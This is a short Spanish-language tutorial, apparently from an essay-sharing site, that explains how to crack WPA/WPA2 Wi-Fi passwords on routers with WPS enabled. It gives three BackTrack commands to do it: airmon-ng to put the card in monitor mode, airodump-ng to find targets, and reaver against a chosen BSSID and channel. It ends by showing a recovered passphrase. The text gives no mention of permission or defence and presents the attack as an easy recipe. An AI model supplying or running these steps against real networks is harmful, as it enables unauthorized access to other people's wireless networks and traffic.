ensayo
Backtrack : http://www.backtrack-linux.org/downloads/
Ahora vamos a romper claves WPA-WPA2 pero solo si tienen WPS activado:
Lo primero que debemos hacer es abrir una terminal y ejecutar elcomando:
airmon-ng start wlan0
con este comando lo que haremos es poner nuestra tarjeta en modo monitor o promiscuo
El segundo comando a ejecutar es elsiguiente:
airodump-ng mon0
Con este comando buscamos las redes disponibles y su información en cuanto a BSSID,PWR, Beacons,#Data ,Channel,etc. Ctrl+cpara detener el escaneo
Finalmente ejecutamos el siguiente comando :
reaver –i mon0 –b (BSSID) -c (canal) -vv (ojo son dos v no una w)
Yaejecutado el comando comienza a trabajar y a desencriptar..!!!
Finalmente esperamos y nos da la siguiente información, en la cual nos entrega la contraseña de lared a buscar la que seria:
WPA PSK: ‘jn20110x’, obviamente la escribiremos sin las comillas.
Bueno, eso seria todo, solo en 3 sencillos pasos.
Cabeseñalar que el tiempo de espera es entre 10 minutos en adelante, depende la intensidad de la señal y si tienen cualquier duda o pregunta no duden en comentar .
Regístrate para leer el documento completo.